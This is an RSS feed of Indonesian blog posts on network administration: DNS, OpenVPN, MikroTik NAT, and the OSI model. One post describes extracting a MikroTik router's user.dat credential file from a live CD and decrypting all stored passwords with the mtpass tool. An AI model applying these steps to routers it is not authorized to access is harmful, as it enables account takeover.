<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>-=[banksonk a.k.a bento]=- &#187; Network</title>
	<atom:link href="http://www.kukukakikukakukaku.com/category/network/feed" rel="self" type="application/rss+xml" />
	<link>http://www.kukukakikukakukaku.com</link>
	<description>www.kukukakikukakukaku.com</description>
	<lastBuildDate>Wed, 10 Aug 2011 04:14:43 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.4</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>DNS [Domain Name System] Server On Debian [tested]</title>
		<link>http://www.kukukakikukakukaku.com/dns-domain-name-system-server-on-debian-tested.sonk</link>
		<comments>http://www.kukukakikukakukaku.com/dns-domain-name-system-server-on-debian-tested.sonk#comments</comments>
		<pubDate>Wed, 22 Sep 2010 09:43:25 +0000</pubDate>
		<dc:creator>bento</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[Network]]></category>
		<category><![CDATA[Server]]></category>
		<category><![CDATA[bind9]]></category>
		<category><![CDATA[debian]]></category>
		<category><![CDATA[dns]]></category>
		<category><![CDATA[domain]]></category>
		<category><![CDATA[Domain Name System]]></category>
		<category><![CDATA[multi]]></category>
		<category><![CDATA[NS]]></category>

		<guid isPermaLink="false">http://www.kukukakikukakukaku.com/?p=252</guid>
		<description><![CDATA[Mumpung pas lagi nganggur&#8230; tiba&#8221; pengen banget berbagi secuil pengalaman mainin titid    . Pada kesempatan ini saia ingin share konfigurasi DNS (Domain Name System) Server pada Debian(tested). 
godong sawi gawe jangan, klopo gawe santen
menawi ono kekurangan, monggo di beneraken
bissmillah&#8230;
1. install bind9
2. setelah selesai install bind9 kemudian masuk ke di rektori /etc/bind dan [...]]]></description>
			<content:encoded><![CDATA[<p>Mumpung pas lagi nganggur&#8230; tiba&#8221; pengen banget berbagi secuil pengalaman mainin titid   <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/wub.gif" alt=":wub_tb:" /> <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/thumbup.gif" alt=":thumbup_tb:" />. Pada kesempatan ini saia ingin share konfigurasi DNS (Domain Name System) Server pada Debian(tested). </p>
<p>godong sawi gawe jangan, klopo gawe santen<br />
menawi ono kekurangan, monggo di beneraken</p>
<p>bissmillah&#8230;</p>
<p>1. install bind9</p>
<pre class="chili"><code class="""""""># apt-get install bind9</code></pre>
<p>2. setelah selesai install bind9 kemudian masuk ke di rektori /etc/bind dan copy file yang dibutuhkan yaitu…</p>
<pre class="chili"><code class="""""""># cd /etc/bind/
# cp db.127 /var/cache/bind/db.10
# cp db.local /var/cache/bind/db.banksonk</code></pre>
<p>3. kemudian edit file named.conf.local, dan tambahkan baris seperti berikut :</p>
<pre class="chili"><code class=""""""">
//
// Do any local configuration here
//

// Consider adding the 1918 zones here, if they are not used in your
// organization
//include &quot;/etc/bind/zones.rfc1918&quot;;

zone &quot;kukukaki.net&quot; {
        type master;
                file &quot;/var/cache/bind/db.banksonk&quot;;
};
zone &quot;12.252.10.in-addr.arpa&quot;{
        type master;
                file &quot;/var/cache/bind/db.10&quot;;
};
</code></pre>
<p>4. kemudian edit file /var/cache/bind/db.10</p>
<pre class="chili"><code class="""""""># cd /var/cache/bind/
# nano db.10</code></pre>
<p>isikan baris seperti berikut :</p>
<pre class="chili"><code class=""""""">;
; BIND reverse data file for local loopback interface
;
$TTL    604800
@       IN      SOA     www.kukukaki.net. root.kukukaki.net. (
                              1         ; Serial
                         604800         ; Refresh
                          86400         ; Retry
                        2419200         ; Expire
                         604800 )       ; Negative Cache TTL
;
@       IN      NS      localhost.
254     IN      PTR     www.kukukaki.net.
254     IN      PTR     newfs.kukukaki.net
254     IN      PTR     mirror.kukukaki.net
</code></pre>
<p>5. kemudian file db.banksonk</p>
<pre class="chili"><code class=""""""">;
; BIND data file for local loopback interface
;
$TTL    604800
@       IN      SOA     www.kukukaki.net. root.kukukaki.net. (
                              2         ; Serial
                         604800         ; Refresh
                          86400         ; Retry
                        2419200         ; Expire
                         604800 )       ; Negative Cache TTL
;
@               IN      NS      localhost.
@               IN      A       127.0.0.1
www             IN      A       10.252.12.254
newfs	        IN      A       10.252.12.254
mirror          IN      A       10.252.12.254
</code></pre>
<p>6. kemudian edit file /etc/resolv.conf dan tambahkan nameserver ip localhost…</p>
<pre class="chili"><code class="""""""># nano /etc/resolv.conf</code></pre>
<p>isi seperti berikut :</p>
<pre class="chili"><code class=""""""">search kukukaki.net
nameserver 10.252.12.254
nameserver 202.134.0.155
nameserver 202.134.1.10
</code></pre>
<p>7. setelah itu restart service bind9 dengan perintah…</p>
<pre class="chili"><code class="""""""># /etc/init.d/bind9 restart</code></pre>
<p>8. untuk checkinnya lakukan dengan perintah</p>
<pre class="chili"><code class="""""""># nslookup www.kukukaki.net</code></pre>
<p>hasilnya :</p>
<pre class="chili"><code class="""""""># nslookup www.kukukaki.net
Server:         10.252.12.254
Address:        10.252.12.254#53

Name:   www.kukukaki.net
Address: 10.252.12.254</code></pre>
<p>atau dengan </p>
<pre class="chili"><code class=""""""">nslookup 10.252.12.254</code></pre>
<p>hasilnya :</p>
<pre class="chili"><code class="""""""># nslookup 10.252.12.254
Server:         10.252.12.254
Address:        10.252.12.254#53

254.12.252.10.in-addr.arpa      name = mirror.kukukaki.net.12.252.10.in-addr.arpa.
254.12.252.10.in-addr.arpa      name = newfs.kukukaki.net.12.252.10.in-addr.arpa.
254.12.252.10.in-addr.arpa      name = www.kukukaki.net.
</code></pre>
<p>hihihi&#8230; success dns server done.</p>
<p>nb :</p>
<pre class="chili"><code class=""""""">
» A record atau catatan alamat memetakan sebuah nama host ke alamat IP 32-bit (untuk IPv4).
» AAAA record atau catatan alamat IPv6 memetakan sebuah nama host ke alamat IP 128-bit (untuk IPv6).
» CNAME record atau catatan nama kanonik membuat alias untuk nama domain. Domain yang di-alias-kan memiliki seluruh subdomain dan rekod DNS seperti aslinya.
» MX record atau catatan pertukaran surat memetakan sebuah nama domain ke dalam daftar mail exchange server untuk domain tersebut.
» PTR record atau catatan penunjuk memetakan sebuah nama host ke nama kanonik untuk host tersebut. Pembuatan rekod PTR untuk sebuah nama host di dalam domain in-addr.arpa yang mewakili sebuah alamat IP menerapkan pencarian balik DNS (reverse DNS lookup) untuk alamat tersebut. Contohnya www.icann.net memiliki alamat IP 192.0.34.164, tetapi sebuah rekod PTR memetakan ,,164.34.0.192.in-addr.arpa ke nama kanoniknya: referrals.icann.org.
» NS record atau catatan server nama memetakan sebuah nama domain ke dalam satu daftar dari server DNS untuk domain tersebut. Pewakilan bergantung kepada rekod NS.
» SOA record atau catatan otoritas awal (Start of Authority) mengacu server DNS yang mengediakan otorisasi informasi tentang sebuah domain Internet.</code></pre>
<p>thank`s<br />
banksonk</p>
]]></content:encoded>
			<wfw:commentRss>http://www.kukukakikukakukaku.com/dns-domain-name-system-server-on-debian-tested.sonk/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Instalasi OpenVPN Server on CentOS</title>
		<link>http://www.kukukakikukakukaku.com/instalasi-openvpn-server-on-centos.sonk</link>
		<comments>http://www.kukukakikukakukaku.com/instalasi-openvpn-server-on-centos.sonk#comments</comments>
		<pubDate>Mon, 06 Sep 2010 06:48:05 +0000</pubDate>
		<dc:creator>bento</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[Network]]></category>
		<category><![CDATA[Server]]></category>
		<category><![CDATA[centOS]]></category>
		<category><![CDATA[install]]></category>
		<category><![CDATA[openvpn]]></category>
		<category><![CDATA[ovpn]]></category>
		<category><![CDATA[tunnel]]></category>
		<category><![CDATA[tunnelling]]></category>
		<category><![CDATA[vpn]]></category>

		<guid isPermaLink="false">http://www.kukukakikukakukaku.com/?p=247</guid>
		<description><![CDATA[Download terlebih dahulu source file dan paket rpm lzo yang disediakan oleh OpenVPN, misal :
Instal paket yang dibutuhkan dengan menggunakan Yum Package Managemen:
Dalam contoh ini kita akan membuat sendiri paket RPM yang akan kita install dari source file yang disediakan;
Install OpenVPN menggunakan RPM yang sudah kita buat sebelumnya;
Kopi file configurasi dan script easy-rsa yang dibutuhkan [...]]]></description>
			<content:encoded><![CDATA[<p>Download terlebih dahulu source file dan paket rpm lzo yang disediakan oleh OpenVPN, misal :</p>
<pre class="chili"><code class=""">cd /usr/src/
wget http://www.magnet-id.com/download/etc/openvpn/openvpn-2.0.9.tar.gz
wget http://www.magnet-id.com/download/etc/openvpn/lzo-1.08-4.rf.src.rpm</code></pre>
<p>Instal paket yang dibutuhkan dengan menggunakan Yum Package Managemen:</p>
<pre class="chili"><code class=""">yum install rpm-build autoconf.noarch zlib-devel pam-devel openssl-devel</code></pre>
<p>Dalam contoh ini kita akan membuat sendiri paket RPM yang akan kita install dari source file yang disediakan;</p>
<pre class="chili"><code class=""">rpmbuild –rebuild lzo-1.08-4.rf.src.rpm
rpm -Uvh /usr/src/redhat/RPMS/i386/lzo-*.rpm
rpmbuild -tb openvpn-2.0.9.tar.gz</code></pre>
<p>Install OpenVPN menggunakan RPM yang sudah kita buat sebelumnya;</p>
<pre class="chili"><code class=""">rpm -Uvh /usr/src/redhat/RPMS/i386/openvpn-2.0.9-1.i386.rpm</code></pre>
<p>Kopi file configurasi dan script easy-rsa yang dibutuhkan untuk membuat SSL certificate dan key baik untuk server maupun untuk klien nantinya;</p>
<pre class="chili"><code class=""">cp -r /usr/share/doc/openvpn-2.0.9/easy-rsa/ /etc/openvpn/
cp /usr/share/doc/openvpn-2.0.9/sample-config-files/server.conf /etc/openvpn/</code></pre>
<p>Membuat Certificate dan Key untuk Server</p>
<pre class="chili"><code class=""">cd /etc/openvpn/easy-rsa/</code></pre>
<p>Edit variabel di dalam vars untuk memudahkan kita dalam proses pembuatan SSL certificate;</p>
<pre class="chili"><code class=""">nano vars</code></pre>
<p>Sesuaikan entry berikut (dibagian paling bawah);</p>
<pre class="chili"><code class=""">
export KEY_COUNTRY=ID
export KEY_PROVINCE=&quot;JATIM&quot;
export KEY_CITY=&quot;BLAMBANGAN&quot;
export KEY_ORG=”bento.inc”
export KEY_EMAIL=”me@kukukakikukakukaku.com”</code></pre>
<p>Jalankan perintah berikut;</p>
<pre class="chili"><code class=""">. ./vars #Perhatikan, .(spasi).vars
./clean-all #Akan mengosongkan direktori keys/</code></pre>
<p>Generate SSL Certificate, semua certificate dan key akan berada di dalam direktori /etc/openvpn/easy-rsa/keys;</p>
<pre class="chili"><code class=""">./build-ca</code></pre>
<p>Kemudian kita akan membuat server key, sesuaikan ovpnserver dengan keinginan kita, juga cukup tekan enter untuk variabel yang sudah kita tentukan sebelumnya:</p>
<pre class="chili"><code class=""">./build-key-server ovpnserver</code></pre>
<p>Generate Diffie Hellman:</p>
<pre class="chili"><code class=""">./build-dh</code></pre>
<p>Tunggu sampai proses selesai, file certificate dan key kemudian kita kopi ke /etc/openvpn dimana file server.conf akan ditempatkan, path untuk key dan certificate tersebut nantinya harus disesuaikan dengan informasi yang kita masukkan di file konfigurasi:</p>
<pre class="chili"><code class=""">cp keys/ca.crt ../
cp keys/dh1024.pem ../
cp keys/ovpnserver.key ../
cp keys/ovpnserver.crt ../</code></pre>
<p>Edit file /etc/openvpn/server.conf sesuai dengan keinginan kita, sebagai permulaan silahkan lakukan perubahan pada baris-baris berikut; Sesuaikan konfigurasi push route, push route akan membuat table routing untuk klien yang terkoneksi dengan OpenVPN Server, dalam contoh ini kita ingin agar klien kita menambah routing untuk blok 10.10.10.0/24 ke IP Gateway OpenVPN Server.</p>
<p>local ip.address.listen.server # Tidak perlu dimasukkan kecuali hanya ingin listen di satu IP (Optional)</p>
<pre class="chili"><code class=""">dev tap
;dev tun
ca ca.crt
cert ovpnserver.crt
key ovpnserver.key
server 10.10.11.0 255.255.255.0
push “route 10.10.10.0 255.255.255.0?</code></pre>
<p>Konfigurasi blok IP Address pada direktif server akan menentukan blok IP Address di interface tap yang muncul kita OpenVPN Server dijalankan, dan muncul di sisi klien ketika terkoneksi.</p>
<p>startup</p>
<pre class="chili"><code class=""">service openvpn start
chkconfig openvpn on</code></pre>
<p>dan jangan lupa untuk routingnya:</p>
<pre class="chili"><code class=""">iptables -t nat -A POSTROUTING -s 10.10.10.0/24 -o venet0 -j SNAT --to -ip lokal server-
/etc/init.d/iptables save #untuk save routing/iptables</code></pre>
<p>refrensi : </p>
<pre class="chili"><code class=""">- http://artikel.magnet-id.com/aplikasi-linux/instalasi-openvpn-server-di-centos-52-64-bit/</code></pre>
]]></content:encoded>
			<wfw:commentRss>http://www.kukukakikukakukaku.com/instalasi-openvpn-server-on-centos.sonk/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Redirect webserver dibelakang router mikrotik</title>
		<link>http://www.kukukakikukakukaku.com/redirect-webserver-dibelakang-router-mikrotik.sonk</link>
		<comments>http://www.kukukakikukakukaku.com/redirect-webserver-dibelakang-router-mikrotik.sonk#comments</comments>
		<pubDate>Mon, 19 Jul 2010 08:20:07 +0000</pubDate>
		<dc:creator>bento</dc:creator>
				<category><![CDATA[Network]]></category>
		<category><![CDATA[mikrotik]]></category>
		<category><![CDATA[nat]]></category>
		<category><![CDATA[redirect]]></category>
		<category><![CDATA[router]]></category>
		<category><![CDATA[web]]></category>
		<category><![CDATA[webserver]]></category>

		<guid isPermaLink="false">http://www.kukukakikukakukaku.com/?p=199</guid>
		<description><![CDATA[
iseng² mainan NAT di mikrotik hihihi&#8230; pengennya sih redirect    percobaan awal pake web server sajo, lainnya tinggal kreativitas panjenengan sedoyo&#8230; 
huyee&#8230; langsung sajooo&#8230;
1. install webserver di PC yang posisinya berada dibawah router (bisa pake apache2, wampp, xampp dll).
2. kemudian buka mikrotik setting seperti berikut :
/ip firewall nat chain=dstnat dst-address= protocol=tcp dst-port=
 action=dst-nat [...]]]></description>
			<content:encoded><![CDATA[<p><img src="http://i266.photobucket.com/albums/ii259/banksonk/web.jpg" alt="img" width="500" height="300" align="center"/></p>
<p>iseng² mainan NAT di mikrotik hihihi&#8230; pengennya sih redirect   <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/laugh.gif" alt=":D" /> percobaan awal pake web server sajo, lainnya tinggal kreativitas panjenengan sedoyo&#8230; <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/drunk.gif" alt=":drunk_tb:" /></p>
<p>huyee&#8230; langsung sajooo&#8230;</p>
<p>1. install webserver di PC yang posisinya berada dibawah router (bisa pake apache2, wampp, xampp dll).<br />
2. kemudian buka mikrotik setting seperti berikut :<br />
<code>/ip firewall nat chain=dstnat dst-address=<ip public router> protocol=tcp dst-port=
<port untuk web server (optional)> action=dst-nat to-addresses=<ip private pc client> to-ports=
<port webserver client (default 80)> </code></p>
<p>contoh :<br />
<code>/ip firewall nat chain=dstnat dst-address=10.252.123.34 protocol=tcp dst-port=69 action=dst-nat to-addresses=172.1.1.15 to-ports=80 </code></p>
<p>3. selesai&#8230; web server dibelakang router mikrotik bisa di nikmati dengan mengakeses http://10.252.123.34:69/</p>
<p>nb : ingat dibelakang ip publik harus disertakan port tujuannya kalau tidak akan otomatis mengarah ke port 80 milik router&#8230;</p>
<p>thank`s<br />
banksonk </p>
]]></content:encoded>
			<wfw:commentRss>http://www.kukukakikukakukaku.com/redirect-webserver-dibelakang-router-mikrotik.sonk/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Recovery Password Mikrotik</title>
		<link>http://www.kukukakikukakukaku.com/recovery-password-mikrotik.sonk</link>
		<comments>http://www.kukukakikukakukaku.com/recovery-password-mikrotik.sonk#comments</comments>
		<pubDate>Mon, 10 May 2010 09:19:54 +0000</pubDate>
		<dc:creator>bento</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Network]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Server]]></category>
		<category><![CDATA[crack]]></category>
		<category><![CDATA[mengembalikan]]></category>
		<category><![CDATA[mikrotik]]></category>
		<category><![CDATA[mtpass]]></category>
		<category><![CDATA[mtpass v0.5]]></category>
		<category><![CDATA[password]]></category>
		<category><![CDATA[recovery]]></category>
		<category><![CDATA[router]]></category>

		<guid isPermaLink="false">http://www.kukukakikukakukaku.com/?p=180</guid>
		<description><![CDATA[uda ane praktekin ternyatah bisa&#8230;..  
awal cerita PC router di kantor ada yang ganti passwdnya   coba googling nemu tuh link mtpass v0.3, ternyatah uda kagak bisa di pake tuh mtpassnya&#8230;..alhasil passwd masih terencript&#8230;trus ane coa googling lg nemu mtpass v0.5, dan hasilnya maknyus passwdmya bisa terbaca semua dengan jelas&#8230;aseeeek    [...]]]></description>
			<content:encoded><![CDATA[<p>uda ane praktekin ternyatah bisa&#8230;.. <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/clap.gif" alt=":clap_tb:" /> <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/wub.gif" alt=":wub_tb:" /><br />
awal cerita PC router di kantor ada yang ganti passwdnya  <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/furious.gif" alt=":furious_tb:" /> coba googling nemu tuh link mtpass v0.3, ternyatah uda kagak bisa di pake tuh mtpassnya&#8230;..alhasil passwd masih terencript&#8230;trus ane coa googling lg nemu mtpass v0.5, dan hasilnya maknyus passwdmya bisa terbaca semua dengan jelas&#8230;aseeeek  <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/thumbup.gif" alt=":thumbup_tb:" />  <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/tongue2.gif" alt=":tongue2_tb:" /></p>
<p><code>1. booting PC router pake cd linux live CD kayak ubuntu ato apalah yg laennya (ane sih ake ubuntu)<br />
2. kalo uda masuk dekstopnya kemudian copy file <strong>user.dat</strong> letaknya di <strong>/nova/store/user.dat</strong> (copy pake flashdisk ato apalah terserah). trus reboot dan masuk mikocok lagi...<br />
3. pindah ke PC yang ada OS linuxnya (distro terserah asal uda di install pakage <strong>g++</strong>, ane pake debian lenny).<br />
4. extrak dulu file mtpass v0.5 pake perintah <strong>tar -xvjf namafile</strong><br />
5. masuk ke direktory hasil extrak trus compile file <strong>mtpass.cpp</strong> dengan perintah <strong>g++ -lssl -lcrypto mtpass.cpp -o mtpass(nama file hasil compile)</strong><br />
6. hasilnya ada file baru yaitu <strong>mtpass</strong>, trus copy file user.dat dalam folder tempat mtpass(nama file hasil compile)<br />
7. finishing jalankan dengan perintah <strong>./mtpass user.dat</strong><br />
8. contoh hasilnya ada <a href="http://photo.lareosing.org/image.php?id=EF08_4BE7CA04&#038;jpg"><strong>disini</strong></a></code></p>
<p>**yang mau mtpass v0.5 ada <a href="http://manio.skyboo.net/mikrotik/mtpass-0.5.tar.bz2"><strong>disini</strong></a></p>
<p>selamad mencoba kawand&#8230;..  <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/thumbup.gif" alt=":thumbup_tb:" /></p>
<p>thank`s<br />
banksonk </p>
]]></content:encoded>
			<wfw:commentRss>http://www.kukukakikukakukaku.com/recovery-password-mikrotik.sonk/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>7 OSI Layer on network</title>
		<link>http://www.kukukakikukakukaku.com/7-osi-layer-on-network.sonk</link>
		<comments>http://www.kukukakikukakukaku.com/7-osi-layer-on-network.sonk#comments</comments>
		<pubDate>Sun, 03 Jan 2010 19:03:16 +0000</pubDate>
		<dc:creator>bento</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[Network]]></category>
		<category><![CDATA[Server]]></category>
		<category><![CDATA[Windows]]></category>
		<category><![CDATA[aplication]]></category>
		<category><![CDATA[datalink]]></category>
		<category><![CDATA[layer]]></category>
		<category><![CDATA[OSI]]></category>
		<category><![CDATA[persentation]]></category>
		<category><![CDATA[phisycal]]></category>
		<category><![CDATA[session]]></category>
		<category><![CDATA[transport]]></category>

		<guid isPermaLink="false">http://www.kukukakikukakukaku.com/?p=143</guid>
		<description><![CDATA[Pengantar Model Open Systems Interconnection(OSI)
Model Open Systems Interconnection (OSI) diciptakan oleh International Organization for Standardization (ISO) yang menyediakan kerangka logika terstruktur bagaimana proses komunikasi data berinteraksi melalui jaringan. Standard ini dikembangkan untuk industri komputer agar komputer dapat berkomunikasi pada jaringan yang berbeda secara efisien.

Model Layer OSI

Terdapat 7 layer pada model OSI. Setiap layer bertanggungjawwab secara [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><strong>Pengantar Model Open Systems Interconnection(OSI)</strong></p>
<p style="text-align: center;">Model Open Systems Interconnection (OSI) diciptakan oleh International Organization for Standardization (ISO) yang menyediakan kerangka logika terstruktur bagaimana proses komunikasi data berinteraksi melalui jaringan. Standard ini dikembangkan untuk industri komputer agar komputer dapat berkomunikasi pada jaringan yang berbeda secara efisien.<br />
<strong><br />
Model Layer OSI</strong><br />
<img class="alignnone" src="http://mudji.net/press/wp-content/uploads/2006/05/osigroupedlayers.gif" alt="OSI layer" /></p>
<p style="text-align: center;">Terdapat 7 layer pada model OSI. Setiap layer bertanggungjawwab secara khusus pada proses komunikasi data. Misal, satu layer bertanggungjawab untuk membentuk koneksi antar perangkat, sementara layer lainnya bertanggungjawab untuk mengoreksi terjadinya “error” selama proses transfer data berlangsung.<br />
Model Layer OSI dibagi dalam dua group: “upper layer” dan “lower layer”. “Upper layer” fokus pada applikasi pengguna dan bagaimana file direpresentasikan di komputer. Untuk Network Engineer, bagian utama yang menjadi perhatiannya adalah pada “lower layer”. Lower layer adalah intisari komunikasi data melalui jaringan aktual.</p>
<p style="text-align: center;">“Open” dalam OSI adalah untuk menyatakan model jaringan yang melakukan interkoneksi tanpa memandang perangkat keras/ “hardware” yang digunakan, sepanjang software komunikasi sesuai dengan standard. Hal ini secara tidak langsung menimbulkan “modularity” (dapat dibongkar pasang).</p>
<p style="text-align: center;"><strong>Modularity</strong><br />
“Modularity” mengacu pada pertukaran protokol di level tertentu tanpa mempengaruhi atau merusak hubungan atau fungsi dari level lainnya.<br />
Dalam sebuah layer, protokol saling dipertukarkan, dan memungkinkan komunikasi terus berlangsung. Pertukaran ini berlangsung didasarkan pada perangkat keras “hardware” dari vendor yang berbeda dan bermacam-macam alasan atau keinginan yang berbeda.</p>
<p style="text-align: center;">
<table id="wp-table-reloaded-id-3-no-1" class="wp-table-reloaded wp-table-reloaded-id-3">
<thead>
	<tr class="row-1 odd">
		<th class="column-1">Modularity</th>
	</tr>
</thead>
<tbody>
	<tr class="row-2 even">
		<td class="column-1"><img class="aligncenter" src="http://mudji.net/press/wp-content/uploads/2006/05/modularity_1.gif" alt="modularity-1" /></td>
	</tr>
	<tr class="row-3 odd">
		<td class="column-1">Seperti contoh Jasa Antar/Kurir. “Modularity” pada level transportasi menyatakan bahwa tidak penting, bagaimana cara paket sampai ke pesawat.</td>
	</tr>
	<tr class="row-4 even">
		<td class="column-1"><img class="aligncenter" src="http://mudji.net/press/wp-content/uploads/2006/05/modularity_2.gif" alt="modularity-2" /></td>
	</tr>
	<tr class="row-5 odd">
		<td class="column-1">Paket untuk sampai di pesawat, dapat dikirim melalui truk atau kapal. Masing-masing cara tersebut, pengirim tetap mengirimkan dan berharap paket tersebut sampai di Toronto. Pesawat terbang membawa paket ke Toronto tanpa memperhatikan bagaimana paket tersebut sampai di pesawat itu.</td>
	</tr>
</tbody>
</table>
</p>
<p style="text-align: center;"><strong><br />
7 Layer OSI</strong></p>
<p style="text-align: center;"><strong>Model OSI terdiri dari 7 layer :</strong><br />
* Application<br />
* Presentation<br />
* Session<br />
* Transport<br />
* Network<br />
* Data Link<br />
* Physical</p>
<p style="text-align: center;"><strong>Apa yang dilakukan oleh 7 layer OSI ?</strong></p>
<p style="text-align: center;"><img class="aligncenter" src="http://mudji.net/press/wp-content/uploads/2006/05/osilayer.gif" alt="prosses" /></p>
<p style="text-align: center;">Ketika data ditransfer melalui jaringan, sebelumnya data tersebut harus melewati ke-tujuh layer dari satu terminal, mulai dari layer aplikasi sampai physical layer, kemudian di sisi penerima, data tersebut melewati layer physical sampai aplikasi. Pada saat data melewati satu layer dari sisi pengirim, maka akan ditambahkan satu “header” sedangkan pada sisi penerima “header” dicopot sesuai dengan layernya.</p>
<p style="text-align: center;"><strong>Model OSI</strong></p>
<p style="text-align: center;">Tujuan utama penggunaan model OSI adalah untuk membantu desainer jaringan memahami fungsi dari tiap-tiap layer yang berhubungan dengan aliran komunikasi data. Termasuk jenis-jenis protoklol jaringan dan metode transmisi.</p>
<p style="text-align: center;">Model dibagi menjadi 7 layer, dengan karakteristik dan fungsinya masing-masing. Tiap layer harus dapat berkomunikasi dengan layer di atasnya maupun dibawahnya secara langsung melalui serentetan protokol dan standard.</p>
<p style="text-align: center;">
<table id="wp-table-reloaded-id-4-no-1" class="wp-table-reloaded wp-table-reloaded-id-4">
<thead>
	<tr class="row-1 odd">
		<th class="column-1">Model OSI</th><th class="column-2">Keterangan</th>
	</tr>
</thead>
<tbody>
	<tr class="row-2 even">
		<td class="column-1"><img class="aligncenter" src="http://mudji.net/press/wp-content/uploads/2006/05/osilayers_1.gif" alt="Application layer" /></td><td class="column-2">Application Layer: Menyediakan jasa untuk aplikasi pengguna. Layer ini bertanggungjawab atas pertukaran informasi antara program komputer, seperti program e-mail, dan service lain yang jalan di jaringan, seperti server printer atau aplikasi komputer lainnya.</td>
	</tr>
	<tr class="row-3 odd">
		<td class="column-1"><img class="aligncenter" src="http://mudji.net/press/wp-content/uploads/2006/05/osilayers_2.gif" alt="Presentation Layer" /></td><td class="column-2">Presentation Layer: Bertanggung jawab bagaimana data dikonversi dan diformat untuk transfer data. Contoh konversi format text ASCII untuk dokumen, .gif dan JPG untuk gambar. Layer ini membentuk kode konversi, translasi data, enkripsi dan konversi.</td>
	</tr>
	<tr class="row-4 even">
		<td class="column-1"><img class="aligncenter" src="http://mudji.net/press/wp-content/uploads/2006/05/osilayers_3.gif" alt="Session Layer" /></td><td class="column-2">Session Layer: Menentukan bagaimana dua terminal menjaga, memelihara dan mengatur koneksi,- bagaimana mereka saling berhubungan satu sama lain. Koneksi di layer ini disebut “session”.</td>
	</tr>
	<tr class="row-5 odd">
		<td class="column-1"><img class="aligncenter" src="http://mudji.net/press/wp-content/uploads/2006/05/osilayers_4.gif" alt="Transport Layer" /></td><td class="column-2">Transport Layer: Bertanggung jawab membagi data menjadi segmen, menjaga koneksi logika “end-to-end” antar terminal, dan menyediakan penanganan error (error handling).<br />
</td>
	</tr>
	<tr class="row-6 even">
		<td class="column-1"><img class="aligncenter" src="http://mudji.net/press/wp-content/uploads/2006/05/osilayers_5.gif" alt="Network Layer" /></td><td class="column-2">Network Layer: Bertanggung jawab menentukan alamat jaringan, menentukan rute yang harus diambil selama perjalanan, dan menjaga antrian trafik di jaringan. Data pada layer ini berbentuk paket.</td>
	</tr>
	<tr class="row-7 odd">
		<td class="column-1"><img class="aligncenter" src="http://mudji.net/press/wp-content/uploads/2006/05/osilayers_6.gif" alt="OSI layer" /></td><td class="column-2">Data Link Layer: Menyediakan link untuk data, memaketkannya menjadi frame yang berhubungan dengan “hardware” kemudian diangkut melalui media. komunikasinya dengan kartu jaringan, mengatur komunikasi layer physical antara sistem koneksi dan penanganan error.</td>
	</tr>
	<tr class="row-8 even">
		<td class="column-1"><img class="aligncenter" src="http://mudji.net/press/wp-content/uploads/2006/05/osilayers_7.gif" alt="Physical Layer" /></td><td class="column-2">Physical Layer: Bertanggung jawab atas proses data menjadi bit dan mentransfernya melalui media, seperti kabel, dan menjaga koneksi fisik antar sistem.</td>
	</tr>
</tbody>
</table>
</p>
<p style="text-align: center;">source : http://mudji.net</p>
]]></content:encoded>
			<wfw:commentRss>http://www.kukukakikukakukaku.com/7-osi-layer-on-network.sonk/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Complete list of Facebook Chat Emoticons</title>
		<link>http://www.kukukakikukakukaku.com/136.sonk</link>
		<comments>http://www.kukukakikukakukaku.com/136.sonk#comments</comments>
		<pubDate>Sun, 06 Dec 2009 01:45:22 +0000</pubDate>
		<dc:creator>bento</dc:creator>
				<category><![CDATA[Coretan]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Network]]></category>
		<category><![CDATA[Server]]></category>
		<category><![CDATA[Windows]]></category>
		<category><![CDATA[chat]]></category>
		<category><![CDATA[daftar]]></category>
		<category><![CDATA[emosi]]></category>
		<category><![CDATA[emoticons]]></category>
		<category><![CDATA[facebook]]></category>
		<category><![CDATA[list]]></category>

		<guid isPermaLink="false">http://www.kukukakikukakukaku.com/?p=136</guid>
		<description><![CDATA[Sering make facebook buat chat sama temen?
Tau emoticon?
